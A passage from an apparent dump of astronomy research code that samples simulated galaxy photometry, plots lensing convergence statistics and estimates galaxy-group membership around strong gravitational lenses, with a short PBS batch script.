alpha=0.4)\naxes[2].yaxis.set_major_locator(MaxNLocator(5))\naxes[2].set_ylabel(\"$s$\")\naxes[2].set_xlabel(\"step number\")\nfig.tight_layout(h_pad=0.0)\nfig.show()\n#fig.savefig(\"line-time.png\")\n\nsampler.reset() # save in pos the position of the walkers at the end of the burn-in, and rerun from there\n#sampler.run_mcmc(pos, nsteps) # instead of this, I am doing as follows so I can display the progress:\nfor i, result in enumerate(sampler.sample(pos,iterations=nsteps)): # fails unless I keep the keyword *iterations*\n if (i+1) % 100 == 0:\n print(\"{0:5.1%}\".format(float(i) / nsteps))\n\nalpha_samp = sampler.flatchain.T[0] # combines all walkers\nbeta_samp = sampler.flatchain.T[1]\nsigma_samp = sampler.flatchain.T[2]\nprint(\"Autocorrelation time:\", sampler.get_autocorr_time())\nprint \"acceptance fraction: \", np.median(sampler.acceptance_fraction)\nprint \"median, std 1: \", np.median(alpha_samp), np.std(alpha_samp)\nprint \"median, std 2: \", np.median(beta_samp), np.std(beta_samp)\nprint \"median, std 3: \", np.median(sigma_samp), np.std(sigma_samp)\nfig = corner.corner(sampler.flatchain, labels=[\"$a$\", \"$b$\", \"$s$\"],truths=[25, 0.5, 10])\nfig.show()\n\n# emcee can probe multiple minima by using different temperatures; Emcee includes a PTSampler (PT = parallel tempering) that has a method PTSampler.thermodynamic_integration_log_evidence() for performing the evidence integral after the sampler is run\n# saving progress\n# there is an ipython parallel example in the emcee code. how does that work? 
also, look into the loadbalance example; there is also a subprocessing.py example to run on multiple computers\n" }, { "alpha_fraction": 0.5645973086357117, "alphanum_fraction": 0.6002516746520996, "avg_line_length": 57.62295150756836, "blob_id": "8b3eab234126986f876cd50e2f575ebc151ea123", "content_id": "6fee60709c01c47c9a07c42b93a29f2937aa5cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7152, "license_type": "no_license", "max_line_length": 318, "num_lines": 122, "path": "/python/catalogue_utilities/extractMillennium_Henriques.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code samples from the Millennium Simulation (MS) photometry, assuming observed CFHTLenS-like or observed lens-like uncertainties. The files it creates will be used by photozMillenium.py\n# run as: python extractMillennium_Henriques.py GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\n\nimport numpy as np\nimport sys\nimport class_Henriques2014 # this is class_Henriques2014.py\n\nilim = 22.5\nfilters = \"griz\"\nrootin = \"/lfs08/rusucs/0408/completegalcat/\"\nrootout = \"/lfs08/rusucs/0408/completegalcat/Henriques_gal_i225_sampled/\"\nfilein = str(sys.argv[1])\nfileout = rootout + filein + \"_%s.images.txt\" % filters\n\npl = np.linspace(27,63,63 - 27 + 1) # plane 27 redshift 3.06\ndata = np.empty(8)\nfor i in range(len(pl)):\n    with open(\"%s%s_%d_f.images\" % (rootin,filein,pl[i]), mode = 'rb') as file:\n        lower_bound = np.fromfile(file, 'f8', 2)\n        upper_bound = np.fromfile(file, 'f8', 2)\n        plane_angle, = np.fromfile(file, 'f8', 1)\n        redshift, = np.fromfile(file, 'f8', 1)\n        n_galaxies, = np.fromfile(file, 'i8', 1)\n        n_cells = np.fromfile(file, 'i4', 2)\n        gal_struct = class_Henriques2014.Henriques2014()\n        galaxy = np.fromfile(file, gal_struct.galaxy_struct, n_galaxies)\n\n    id = galaxy['galaxy_id']\n    zspec = galaxy['redshift']\n    pos0 = galaxy['position'][:,0]\n    pos1 = galaxy['position'][:,1]\n    gmag = galaxy['mag'][:,gal_struct.filter_number_for_g_band_trans]\n    rmag = galaxy['mag'][:,gal_struct.filter_number_for_r_band_trans]\n    imag = galaxy['mag'][:,gal_struct.filter_number_for_i_band_trans]\n    zmag = galaxy['mag'][:,gal_struct.filter_number_for_z_band_trans]\n    gal = np.c_[id,zspec,pos0,pos1,gmag,rmag,imag,zmag].T\n    data = np.c_[data,gal]\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\ng = 4\nr = 5\ni = 6\nz = 7\ndataout = np.zeros([np.shape(data)[0]+4,np.shape(data)[1]]) # use this instead of data since I am modifying the content but I will still need the original content when working with multiple sets of filters\nid_o = 0\nzspec_o = 1\nposx_o = 2\nposy_o = 3\ng_o = 4\ngerr_o = 5\nr_o = 6\nrerr_o = 7\ni_o = 8\nierr_o = 9\nz_o = 10\nzerr_o = 11\n\ndataout[id_o] = np.copy(data[id])\ndataout[zspec_o] = np.copy(data[zspec])\ndataout[posx_o] = np.copy(data[posx])\ndataout[posy_o] = np.copy(data[posy])\ndataout[g_o] = np.copy(data[g])\ndataout[r_o] = np.copy(data[r])\ndataout[i_o] = np.copy(data[i])\ndataout[z_o] = np.copy(data[z])\n\n''' Sampling the photometry by assuming error bars from the observations. 
First assign the non-fixed error bar, then sample a new photometry point'''\nif filters == \"griz\":\n# griz (DES-like)\n file_errorbars = \"/lfs08/rusucs/code/median_errors_hlin_12Aug2019edited.txt\"\n err = np.loadtxt(file_errorbars,unpack=True)\n err_maginf = 0\n err_magsup = 1\n err_g_lnmed = 2\n err_g_lnsig = 3\n err_r_lnmed = 5\n err_r_lnsig = 6\n err_i_lnmed = 8\n err_i_lnsig = 9\n err_z_lnmed = 11\n err_z_lnsig = 12\n\n dataout[gerr_o][dataout[g_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_g_lnmed][0], err[err_g_lnsig][0], len(dataout[gerr_o][dataout[g_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_g_lnmed][j], err[err_g_lnsig][j], len(dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])]))\n dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_g_lnmed][-1], err[err_g_lnsig][-1], len(dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]]))\n\n dataout[rerr_o][dataout[r_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_r_lnmed][0], err[err_r_lnsig][0], len(dataout[rerr_o][dataout[r_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_r_lnmed][j], err[err_r_lnsig][j], len(dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])]))\n dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_r_lnmed][-1], err[err_r_lnsig][-1], len(dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]]))\n\n dataout[ierr_o][dataout[i_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_i_lnmed][0], err[err_i_lnsig][0], len(dataout[ierr_o][dataout[i_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_i_lnmed][j], err[err_i_lnsig][j], len(dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])]))\n dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_i_lnmed][-1], err[err_i_lnsig][-1], len(dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]]))\n\n dataout[zerr_o][dataout[z_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_z_lnmed][0], err[err_z_lnsig][0], len(dataout[zerr_o][dataout[z_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_z_lnmed][j], err[err_z_lnsig][j], len(dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])]))\n dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_z_lnmed][-1], err[err_z_lnsig][-1], len(dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]]))\n\n dataout[g_o] = np.random.normal(dataout[g_o], dataout[gerr_o])\n dataout[r_o] = np.random.normal(dataout[r_o], dataout[rerr_o])\n dataout[i_o] = np.random.normal(dataout[i_o], dataout[ierr_o])\n dataout[z_o] = np.random.normal(dataout[z_o], dataout[zerr_o])\n\n dataout[gerr_o][dataout[gerr_o] <= 0.01] = 0.01\n dataout[rerr_o][dataout[rerr_o] <= 0.01] = 0.01\n dataout[ierr_o][dataout[ierr_o] <= 0.01] = 0.01\n dataout[zerr_o][dataout[zerr_o] <= 0.01] = 0.01\n\n dataout = 
np.delete(dataout,np.where(dataout[i_o] > ilim),axis=1)\n dataout = np.delete(dataout,np.where(dataout[i_o] < 0),axis=1) # because there are some -inf in 8_7_7 and 8_3_7\n\n head = \"GalID \\t z_spec \\t pos0 \\t pos1 \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\"\n np.savetxt(fileout,np.c_[dataout[id_o],dataout[zspec_o],dataout[posx_o],dataout[posy_o],dataout[g_o],dataout[gerr_o],dataout[r_o],dataout[rerr_o],dataout[i_o],dataout[ierr_o],dataout[z_o],dataout[zerr_o]],header=head,fmt='%d \\t %.7f \\t %.7f \\t %.7f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\nprint filein + ' Done!'\n" }, { "alpha_fraction": 0.6063218116760254, "alphanum_fraction": 0.6954023241996765, "avg_line_length": 19.41176414489746, "blob_id": "e8f310c563d986dab364cfefeb29716f477b52a1", "content_id": "6ea76ca45975a11af1d2130cf579d47da18f3248", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 348, "license_type": "no_license", "max_line_length": 122, "num_lines": 17, "path": "/python/scripts/NAOJ/batch0_insertstarsnomass.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb17.out\n#PBS -e Logb17.err\n#PBS -N 17\n#PBS -l mem=4gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomasstable.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5 -1 -1\n\n" }, { "alpha_fraction": 0.48022598028182983, "alphanum_fraction": 0.6725988984107971, "avg_line_length": 55.19047546386719, "blob_id": "6419ec29230252f2e7ff527594e3e36bfa7edb0e", "content_id": "539767f0025726d2804fe8d750fea21dc2a0e97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3540, "license_type": "no_license", "max_line_length": 165, "num_lines": 63, "path": "/python/plot_utilities/kappa_medsigsim.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 
2017\n\n#import matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n#import scipy as sp\nfrom scipy.stats import norm\nfrom scipy.optimize import curve_fit\nimport numpy as np\nimport os\nimport glob\n\n# I used inferkappa_unbiasedwithshear45and120FITSio_customzeta.py on J1206 24 with pure number counts, zeta=0.6,0.8,1.0,1.2,1.4,1.6,1.8,2.0(,2.6)\n# with width +/-0.05 to explore the relation between kappamed and sigma:\n#medpdf_45=np.array([ -0.036,-0.025,-0.014,-0.000,0.017,0.036,0.060,0.087,0.180])\n#stdpdf_45=np.array([0.018 ,0.021,0.024,0.029,0.035,0.042,0.051,0.061,0.092])\n#medpdf_120=np.array([-0.045,-0.030,-0.012,0.009,0.034,0.064,0.097,0.118])\n#stdpdf_120=np.array([0.017,0.021,0.026,0.033,0.042,0.052,0.068,0.076])\n\n# I used inferkappa_unbiasedwithshear45and120FITSio_customzeta.py on WFI2033 22.5 with pure number counts, zeta=0.6,0.8,1.0,1.2,1.4,1.6,1.8,2.0,2.2,2.4,(2.6,3.0,3.4)\n# with width +/-0.1 and E=1 to explore the relation between kappamed and sigma:\nmedpdf_45=np.array([ -0.027,-0.022,-0.016,-0.010,-0.004,0.003,0.011,0.020,0.031,0.043,0.056,0.071,0.086,0.101,0.118,0.135,0.155,0.181,0.202,0.220])\nstdpdf_45=np.array([0.026, 0.026, 0.028, 0.031, 0.033, 0.037,0.042,0.044,0.050,0.061,0.063,0.067,0.075,0.085,0.092,0.105,0.116,0.132,0.137,0.132])\nmedpdf_120=np.array([-0.034,-0.025,-0.016,-0.005,0.006,0.020,0.036,0.054,0.074,0.094,0.118,0.139,0.159])\nstdpdf_120=np.array([0.024, 0.027, 0.032,0.035, 0.040,0.047,0.053,0.063,0.076,0.090,0.094,0.104,0.121])\n\ndef func(x, a, b):\n return a * x + b\n\npopt45, pcov45 = curve_fit(func, medpdf_45, stdpdf_45)\npopt120, pcov120 = curve_fit(func, medpdf_120, stdpdf_120)\n#plt.plot(medpdf_45, stdpdf_45, 'b-', label='data45')\n#plt.plot(medpdf_120, stdpdf_120, 'r-', label='data120')\n#plt.plot(medpdf_45, func(medpdf_45, *popt45), 'b-.',label='fit: a=%5.3f, b=%5.3f' % tuple(popt45))\n#plt.plot(medpdf_120, func(medpdf_120, *popt120), 'r-.',label='fit: a=%5.3f, b=%5.3f' % tuple(popt120))\n#plt.legend()\n#plt.show()\npopt = np.mean([popt45,popt120],axis=0)\n\n# But the way inferkappa_unbiasedwithshear45and120FITSio_customzeta.py computes std is not a simple np.std, which is output by inferkappasimbias.py\n# Normalizing std(truekappa-medkappa):\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_2/\"\n#x = np.loadtxt(root+'kappasim_WFI2033_measured_5innermask_nobeta_zgap-1.0_-1.0_45_gal_22.5_med_1.0_overdensities1.0.cat',unpack=True)\nx = np.loadtxt(root+'kappasim_WFI2033_measured_5innermask_nobeta_zgap-1.0_-1.0_45_gal_22.5_med_overdensities1.44.cat',unpack=True)\n#x = np.loadtxt(root+'kappasim_WFI2033_measured_5innermask_nobeta_zgap-1.0_-1.0_120_gal_22.5_med_overdensities1.55.cat',unpack=True)\n\nlist = glob.glob(root+'kappasim_WFI2033*.cat')\nfout = root + 'medstdbias.dat'\nos.system('rm -f %s' % fout)\n\nfor i in range(len(list)):\n file = list[i]\n data = np.loadtxt(file)\n data = data[data[:,4] >= 3] # at least 3 LOS\n data = data.T\n if np.shape(data)[1] != 0:\n scaledstd = np.std(data[1]-data[0]) * (func(np.median(x[1]), *popt)/func(np.median(data[1]), *popt)) / np.std(x[1]-x[0])\n str = \"%s %.3f %.3f %d %d %.3f \\n\" % (list[i],np.median(data[0]-data[1]),np.std(data[0]-data[1]),np.median(data[4]),len(data[0]),scaledstd)\n #str = \"%s %.3f %.3f %d %d \\n\" % (list[i],np.median(data[1]),np.std(data[0]-data[1]),np.median(data[4]),len(data[0]))\n else: str = \"%s 0.000 0.000 0 0 0.000 \\n\" % (list[i])\n file =open(fout,'a')\n file.write(str)\nfile.close()\n" }, { "alpha_fraction": 
0.6288546323776245, "alphanum_fraction": 0.6921806335449219, "avg_line_length": 38.4782600402832, "blob_id": "f738188cd106eae7b43e09bb6c84d47540c1fa87", "content_id": "eec2d8756e29ada6ae7304b014438ddb88f01317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1816, "license_type": "no_license", "max_line_length": 234, "num_lines": 46, "path": "/python/plot_utilities/image.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# creates figure 1 from Rusu et al. 2017\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\npix = 915 # number of pixels in 4 arcmin\nscale = 240.0 / pix\nmaglim = 23\nx,y,i,classify = np.loadtxt(\"/Users/eduardrusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\",usecols=[0,1,4,97],unpack=True)\nsep = np.sqrt((x - 457.5)**2 + (y - 457.5)**2) * scale\n\nx = x[(sep <= 120) & (i <= maglim)]\ny = y[(sep <= 120) & (i <= maglim)]\nclassify = classify[(sep <= 120) & (i <= maglim)]\nsep = sep[(sep <= 120) & (i <= maglim)]\n\nx_spec = x[(classify == 0) | (classify == 1)]\ny_spec = y[(classify == 0) | (classify == 1)]\n\nx_star = x[classify < 0]\ny_star = y[classify < 0]\n\nx_galnospec = x[classify == 2]\ny_galnospec = y[classify == 2]\n\nimage = fits.getdata(\"/Users/eduardrusu/Desktop/WFI2033/WFI2033analysis/FINALweighted_ir.fits\")\nimage[image<0]=0.0001\n\nmask = fits.getdata(\"6_120arcsec.fits\")\n\nplt.scatter(x_star,y_star,marker='*',facecolors='none', edgecolors='k')\nplt.scatter(x_galnospec,y_galnospec,marker='o',facecolors='none', edgecolors='k')\nplt.scatter(x_spec,y_spec,marker='s',facecolors='none', edgecolors='k')\nplt.imshow(image, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=0.001, vmax=100)\nplt.imshow(mask, cmap='Oranges', origin='lower', alpha=0.2)\ncircle1 = plt.Circle((pix/2.0,pix/2.0),45/120.0*pix/2.0,color='k',fill=False)\ncircle2 = plt.Circle((pix/2.0,pix/2.0),pix/2.0,color='k',fill=False)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig.gca().add_artist(circle2)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('FOV_WFI2033.png', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.577051043510437, "alphanum_fraction": 0.65347820520401, "avg_line_length": 65.55363464355469, "blob_id": "1eec2b785caedec2ce77b430ea2a07532b852aef", "content_id": "697203d1e788d2e5bb812775f92f2df218381f22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19234, "license_type": "no_license", "max_line_length": 287, "num_lines": 289, "path": "/python/catalogue_utilities/groupsampling.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run this code in order to sample galaxies possibly part of an incomplete spectroscopic group\n# no uncertainties are assumed on the group centroid because they are small enough to ignore\n# if I get the error ValueError: Cannot take a larger sample than population when 'replace=False', simply run the code again or increase the faintmagspec or photoztolerance\n\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\nselectpdz = True # whether or not to actually select a number of desired samples, not just compute the theoretical distributions\nif selectpdz == True: samples = 20 # define any 
number of desired samples\nmode = \"poisson\"\n#mode = \"mcmc\"\nphotoztolerance = 2.5 # number of sigmas; doesn't apply to PG1115\n#lens = 'PG1115'\n#lens = 'WFI2033'\nlens = '0408'\n#zgroup = 0.6588 # WFI2033lens\n#zgroup = 0.4956 # WFI2033\nif lens == '0408': zgroup = 0.598 # 0408, Jason's group 5, including the lens\nif lens == 'PG1115': zgroup = 0.3097\nif lens == '0408' or lens == 'WFI2033' or lens == 'PG1115': limmag = 22.5 # slightly fainter than faintest in Momcheva, for PG1115\nif lens == '0408' or lens == 'WFI2033' or lens == 'PG1115': faintmagspec = 22.5 # for PG1115, slightly fainter than faintest in Momcheva\nif lens == '0408': center_lensx = '04:08:21.700'; center_lensy = '-53:53:59.40' # by eye from HST images\nif lens == 'WFI2033': center_lensx = '20:33:42.080'; center_lensy = '-47:23:43.00' # WFI2033\nif lens == 'PG1115': center_lensx = '11:18:16.90'; center_lensy = '+07:45:59.00' # PG1115\ncenter_lens = SkyCoord(center_lensx + ' ' + center_lensy, frame='fk5', unit=(u.hourangle, u.deg))\nif lens == '0408' and zgroup == 0.598:\n center_groupx = '62.0797'; center_groupy = '-53.9011'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 21.6 # converted to arcsec\n virrad = 104 # actually R_200 in arcsec\n virrad_err = 54\nif zgroup == 0.6588:\n center_groupx = '308.43557011'; center_groupy = '-47.37411275'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 26 # converted to arcsec\n virrad = 142 # actually R_200 in arcsec - from Dominique's email on Dec 3 2018\n virrad_err = 22\nif zgroup == 0.4956:\n center_groupx = '308.46337200'; center_groupy = '-47.36336725'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 60\n virrad = 164\n virrad_err = 33\nif zgroup == 0.3097:\n center_groupx = '169.5681'; center_groupy = '7.7648'\n center_group = SkyCoord(center_groupx + ' ' + center_groupy, frame='fk5', unit=(u.deg, u.deg))\n err_group = 20\n virrad = 180\n virrad_err = 36 # arbitrary 20%, as average between the ones from Dominique\n\nsep_groupx = center_lens.separation(SkyCoord(center_groupx + ' ' + center_lensy, frame='fk5', unit=(u.deg, u.deg))).arcsec\nsep_groupy = center_lens.separation(SkyCoord(center_lensx + ' ' + center_groupy, frame='fk5', unit=(u.hourangle, u.deg))).arcsec\n# arcsec # using R_200, which is robust against Dominique's and is used in the reference papers\n# Each of the 2 groups in WFI2033 have 3 galaxies outside R_200 so I should not count these\nif lens == '0408' and zgroup == 0.598: observed_members = 17\nif zgroup == 0.6588: observed_members = 16 # inside virial radius; the last column in the table from Dominique\nif zgroup == 0.4956: observed_members = 7\nif zgroup == 0.3097: observed_members = 13\nif lens == 'PG1115':\n file = '/Users/cerusu/Dropbox/Davis_work/code/PG1115/PG1115.cat'\n data = np.loadtxt(file,usecols=[2,3,4,8,11])\n othergals = np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/PG1115/galotherredshift.cat', usecols=[0])\n groupgals = np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/PG1115/galgroup.cat')\n ra = 0\n dec = 1\n id = 2\n flux_rad = 3\n r = 4\nif lens == 'WFI2033':\n file = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n data = np.loadtxt(file,usecols=[2,3,4,8,28,29,30,40,97])\nif lens == '0408':\n file = 
\"/Users/cerusu/Dropbox/Davis_work/code/0408/DESJ0408_cat_filtered_120arcsec_225_includesspeczcol.tab\"\n data = np.loadtxt(file,usecols=[0,1,4,2,10,11,11,15,3])\n data[:,5] = data[:,4] - data[:,5]\n data[:,6] = data[:,4] + data[:,6]\nra = 0\ndec = 1\ni = 2\nid = 3\nz = 4\nzinf = 5\nzsup = 6\nspec = 7\ncls = 8\n\ncoord = SkyCoord(ra=data[:,ra]*u.degree, dec=data[:,dec]*u.degree, frame='fk5')\nsep = coord.separation(center_lens).arcsec\nif lens == 'WFI2033' or lens == '0408': all = len(data[:,id][(sep <= 120) & (data[:,i] <= limmag) & (data[:,cls] >= 0)])\nif lens == 'PG1115': all = len(data[:,id][(sep <= 120) & (data[:,r] <= limmag) & (data[:,flux_rad] >= 1.25)])\nprint \"gals: \",all\nif lens == 'WFI2033' or lens == '0408': specs120 = len(data[:,id][(sep <= 120) & (data[:,i] <= limmag) & (data[:,spec] > 0)])\nif lens == 'PG1115':\n observed120_membersID = groupgals[:,0]\n specs120 = len(observed120_membersID) + 1 + np.shape(othergals)[0] # adding the lens to the counts\nprint \"specs inside 120\\\": \",specs120\nif lens == 'WFI2033': observed120_membersID = data[:,id][(data[:,spec] <= zgroup + 0.01) & (data[:,spec] >= zgroup - 0.01) & (sep <= 120) & (data[:,i] <= limmag) & (data[:,cls] >= 0)]\nif lens == '0408': observed120_membersID = data[:,id][(data[:,spec] <= zgroup + 0.01) & (data[:,spec] >= zgroup - 0.01) & (sep <= 120) & (data[:,i] <= limmag) & (data[:,cls] >= 0)]\nif (lens == 'PG1115') or (zgroup == 0.6588): print 'members inside 120\\\":',len(observed120_membersID) + 1\nelse: print 'members inside 120\\\":',len(observed120_membersID)\nif lens == 'WFI2033' or lens == '0408': pool = data[:,id][(data[:,spec] == -1) & (sep <= 120) & (data[:,cls] >= 0) & (data[:,z] - photoztolerance * (data[:,z] - data[:,zinf]) <= zgroup) & (data[:,z] + photoztolerance * (data[:,zsup] - data[:,z]) >= zgroup) & (data[:,i] <= faintmagspec)]\nif lens == 'PG1115':\n pool = data[:,id][(sep <= 120) & (data[:,r] <= limmag) & (data[:,flux_rad] >= 1.25)]\n for i in range(len(othergals)):\n pool = np.delete(pool,np.where(pool == othergals[i]))\n for i in range(np.shape(groupgals)[0]):\n pool = np.delete(pool,np.where(pool == groupgals[:,0][i]))\nprint 'size of pool: ',len(pool)\n#veldisp0.598 (0408) = 224+58-47 (rest-frame) -> Fig 5 Andreon 2010 far outside the plot, only ~1 member expected\n#veldisp0.66 = 502+/-83 -> Fig 5 Andreon 2010 [median range: 10-(20)-32; 68% range around central '()' median 13-30, in quadrature 20-12+16] galaxies inside R_200\n#veldisp0.49 = 518+/-99 -> Fig 5 Andreon 2010 [median range: 10-(20)-39; 68% range around central '()' median 13-30, in quadrature 20-12+21] galaxies inside R_200\n#veldisp0.31 = 390+50-60 -> Fig 5 Andreon 2010 [median range: 5-(8)-12; 68% range around central '()' median 6-12, in quadrature 8-4+6] galaxies inside R_200\n#veldisp0.31 = 440+90-80 -> Fig 5 Andreon 2010 [median range: 6-(13)-20; 68% range around central '()' median 8-18, in quadrature 13+/-8.5] galaxies inside R_200\nif lens == '0408' and zgroup == 0.598: med = 1; stdinf = 0; stdsup = 2\nif zgroup == 0.6588: med = 20; stdinf = 12; stdsup = 16\nif zgroup == 0.4956: med = 20; stdinf = 12; stdsup = 21\nif zgroup == 0.3097: med = 8; stdinf = 4; stdsup = 6 # Wilson\n#if zgroup == 0.3097: med = 13; stdinf = 8.5; stdsup = 8.5 # Momcheva\n\nif mode == \"mcmc\":\n def expected_members():\n while True:\n # sample uniformly a cube of size 2 x unit radius\n x = np.random.uniform(-1,1,10000)\n y = np.random.uniform(-1,1,10000)\n z = np.random.uniform(-1,1,10000)\n sep_group = np.sqrt(np.random.normal(sep_groupx, 
err_group, 1)**2 + np.random.normal(sep_groupy, err_group, 1)**2)\n virrad_sample = np.max([10,sep_group,np.abs(np.random.normal(virrad, virrad_err, 1))]) # using lower limit to avoid numerical problems\n cx = 1.0 * sep_group / virrad_sample\n cy = 0\n rad = 120.0 / virrad_sample\n # fraction of volume of the virial sphere which contains the 120\"-radius cylinder centered on the lens\n frac = 1.0*len(x[(x**2 + y**2 + z**2 <= 1) & ((x-cx)**2 + (y-cy)**2 <=rad**2)]) / len(x[x**2 + y**2 + z**2 <= 1])\n nr = 0\n while True:\n nr += 1\n rand = np.random.uniform(0,1,1)[0]\n if rand <= 0.5: x = int(round(med - np.abs(np.random.normal(med, stdinf, 1) - med))) # based on the velocity dispersion - concentration relation above\n else: x = int(round(med + np.abs(np.random.normal(med, stdsup, 1) - med)))\n #print x,frac * x, observed_members, len(observed120_membersID)\n if (lens == 'PG1115') or (zgroup == 0.6588):\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID) + 1)) or (nr == 100): break\n else:\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID))) or (nr == 100): break\n if (lens == 'PG1115') or (zgroup == 0.6588):\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID) + 1)): break\n else:\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID))): break\n return x,frac\nif mode == \"mcmc\":\n def expected_members_noprior():\n # sample uniformly a cube of size 2 x unit radius\n x = np.random.uniform(-1,1,10000)\n y = np.random.uniform(-1,1,10000)\n z = np.random.uniform(-1,1,10000)\n sep_group = np.sqrt(np.random.normal(sep_groupx, err_group, 1)**2 + np.random.normal(sep_groupy, err_group, 1)**2)\n virrad_sample = np.max([10,sep_group,np.abs(np.random.normal(virrad, virrad_err, 1))]) # using lower limit to avoid numerical problems\n cx = 1.0 * sep_group / virrad_sample\n cy = 0\n rad = 120.0 / virrad_sample\n # fraction of volume of the virial sphere which contains the 120\"-radius cylinder centered on the lens\n fracnoprior = 1.0*len(x[(x**2 + y**2 + z**2 <= 1) & ((x-cx)**2 + (y-cy)**2 <=rad**2)]) / len(x[x**2 + y**2 + z**2 <= 1])\n while True:\n rand = np.random.uniform(0,1,1)[0]\n if rand <= 0.5: x = int(round(med - np.abs(np.random.normal(med, stdinf, 1) - med))) # based on the velocity dispersion - concentration relation above\n else: x = int(round(med + np.abs(np.random.normal(med, stdsup, 1) - med)))\n break\n return x,fracnoprior\nif mode == \"poisson\":\n def expected_members():\n while True:\n #x = np.random.poisson(1.0 * all * len(observed120_membersID)/specs120, 1)\n if (lens == 'PG1115') or (zgroup == 0.6588):\n x = np.random.poisson(1.0 * all * (len(observed120_membersID) + 1)/specs120, 1) # adding the lens to the counts\n if x >= len(observed120_membersID)+1: break\n else:\n x = np.random.poisson(1.0 * all * (len(observed120_membersID))/specs120, 1)\n if x >= len(observed120_membersID): break\n return x\nif mode == \"poisson\":\n def expected_members_noprior():\n while True:\n #x = np.random.poisson(1.0 * all * len(observed120_membersID)/specs, 1)\n if (lens == 'PG1115') or (zgroup == 0.6588): x = np.random.poisson(1.0 * all * (len(observed120_membersID) + 1)/specs120, 